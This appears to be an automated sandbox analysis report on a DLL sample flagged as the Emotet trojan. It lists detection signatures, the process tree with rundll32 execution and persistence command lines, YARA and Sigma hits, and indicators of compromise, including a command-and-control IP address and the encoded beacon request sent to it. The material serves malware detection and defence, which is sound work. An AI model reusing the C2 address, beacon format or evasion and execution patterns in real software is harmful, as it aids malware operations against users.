Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3pO1282Kpx

Overview

General Information

Sample Name:3pO1282Kpx (renamed file extension from none to dll)
Analysis ID:532438
MD5:173345845a2a7d0d99c17bdc5445df90
SHA1:35ed97b5ac5a3ed0fdc00eabff20f3bfcdfc8a7c
SHA256:9ed58848f0a7b354a32d4ef67ea9ff70ba75f9238c39d9f1af88fae6811cb504
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Multi AV Scanner detection for domain / URL
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2616 cmdline: loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2176 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3256 cmdline: rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5592 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4132 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5848 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1184 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1460 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5856 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2500 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 3444 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 4460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5668 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5936 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3772 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1404 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5496 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5352 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5160 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 4956 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5020 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4776 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2968 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4640 cmdline: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.loaddll32.exe.1523618.10.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              0.0.loaddll32.exe.1523618.10.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.2.rundll32.exe.520000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.2.rundll32.exe.520000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    0.0.loaddll32.exe.1523618.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 75 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5848, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL, ProcessId: 1184

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 3pO1282Kpx.dllVirustotal: Detection: 23%Perma Link
                      Source: 3pO1282Kpx.dllReversingLabs: Detection: 17%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: https://45.63.5.129/Virustotal: Detection: 7%Perma Link
                      Source: 3pO1282Kpx.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.5:49804 version: TLS 1.2
                      Source: 3pO1282Kpx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.500168593.00000000048E8000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000013.00000002.513347635.00000000028F2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE90927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE90927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E2C8 FindFirstFileW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN HTTP/1.1Cookie: gKjP=1pPfMaoMdVUlKQUbAdiebE1XTzpT49WAqPCFzf9esRtAAep5qXcDMA3UcMnz2kDny2NkJZ+XzMNPrbuwewGy7ajRk6O8pCIMyS/tk7KPZ1sVOCZDzij8ol0kzhAKz+cyhczW5/Qg7WStsqckEM0Ai/TBhgYa4zLpY2xrkvKaCs5ZjXU46E7u7NfJ6u2+utMTe+1C5zhUB/BGEkeunoDpKbWBm9Kwrc3B7WoAGu/lbHZZe8hOoLZlL9MMnyWT3k4lhqZIOv4dj0Q=Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000026.00000003.746064591.00000184DC77E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000006.00000002.640848244.000001ECCBE5E000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.542568874.000000000466D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.544260152.000000000466F000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.718963355.0000000002BCE000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764271676.0000000002BCE000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.717667638.0000000002BCE000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.763990473.00000184DC700000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: WerFault.exe, 00000016.00000002.544098709.000000000292C000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsoft
                      Source: svchost.exe, 00000006.00000002.640739362.000001ECCBE15000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000026.00000003.736509284.00000184DC77E000.00000004.00000001.sdmp, svchost.exe, 00000026.00000003.736795820.00000184DCC02000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000006.00000003.639867231.000001ECC66A8000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.640572872.000001ECC66AB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 0000000A.00000002.442020760.0000017F2F613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: rundll32.exe, 00000019.00000002.763936612.0000000002B95000.00000004.00000020.sdmpString found in binary or memory: https://45.63.5.129/
                      Source: rundll32.exe, 00000019.00000002.763540592.0000000002B5A000.00000004.00000020.sdmpString found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDN
                      Source: rundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmpString found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNG
                      Source: rundll32.exe, 00000019.00000002.763540592.0000000002B5A000.00000004.00000020.sdmpString found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNOz
                      Source: rundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmpString found in binary or memory: https://45.63.5.129/fqwqvIpxZYjgSrhYeuylraBSZOVBNdJZxHBzTVnNstuWavuGlHdFStXKFDNb
                      Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000007.00000002.761831217.000002067B43E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.415890921.0000017F2F64D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.446840907.0000017F2F629000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.417063384.0000017F2F643000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.451867623.0000017F2F644000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.417049148.0000017F2F642000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.409552132.0000017F2F652000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
